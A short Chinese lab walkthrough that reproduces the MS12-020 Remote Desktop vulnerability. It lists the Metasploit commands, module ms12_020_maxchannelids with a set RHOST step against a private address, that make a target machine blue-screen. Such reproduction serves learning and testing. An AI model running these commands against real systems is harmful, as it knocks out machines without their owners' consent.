ms12-020漏洞复现

远程桌面中的漏洞可能允许远程执行代码。

远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

在msf中查找该漏洞相关模块search ms12-020
查看模块介绍info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
进入该模块use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
查看选项show options
设置选项参数
从上图中可以看到，要使用该模块需要设置RHOST（远程地址，即被攻击者地址）set rhost 192.168.110.130；
RPORT（远程端口，已经有默认值，可以不自己指定）
漏洞利用exploit
这时候目标主机会出现蓝屏。